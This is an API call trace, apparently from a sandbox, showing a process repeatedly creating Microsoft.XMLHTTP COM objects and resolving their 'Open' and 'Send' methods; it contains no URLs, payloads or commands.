	[0415.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0415.020] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.020] SysStringLen (param_1=0x0) returned 0x0
	[0415.020] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.020] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0415.020] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0415.020] ??2@YAPEAX_K@Z () returned 0x62f330
	[0415.020] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0415.020] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.021] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0415.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0415.021] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0415.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.021] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.024] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.024] SysStringLen (param_1=0x0) returned 0x0
	[0415.024] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.024] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0415.025] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0415.025] ??2@YAPEAX_K@Z () returned 0x62f310
	[0415.025] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f310) 
	[0415.025] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.025] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0415.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0415.025] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0415.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.025] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.026] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.026] SysStringLen (param_1=0x0) returned 0x0
	[0415.026] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.026] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0415.026] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c78) returned 0x0
	[0415.026] ??2@YAPEAX_K@Z () returned 0x62f330
	[0415.026] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c78, pUnkSite=0x62f330) 
	[0415.026] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.026] XMLHTTPRequest:IUnknown:Release (This=0x49c5c78) returned 0x0
	[0415.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0415.026] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0415.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.027] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.027] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.027] SysStringLen (param_1=0x0) returned 0x0
	[0415.027] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.027] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0415.027] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.027] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0415.027] ??2@YAPEAX_K@Z () returned 0x62f310
	[0415.028] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0415.028] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.028] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0415.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0415.028] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0415.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.028] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.028] longjmp () 
	[0415.028] longjmp () 
	[0415.029] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.029] SysStringLen (param_1=0x0) returned 0x0
	[0415.029] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.029] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0415.029] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0415.029] ??2@YAPEAX_K@Z () returned 0x62f330
	[0415.029] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0415.029] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.029] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0415.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0415.030] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0415.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.030] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.030] longjmp () 
	[0415.030] longjmp () 
	[0415.030] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0415.030] SysStringLen (param_1=0x0) returned 0x0
	[0415.030] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0415.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0415.030] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0415.030] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0415.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0415.031] ??2@YAPEAX_K@Z () returned 0x62f310
	[0415.031] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f310) 
	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0415.031] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0415.031] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0415.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
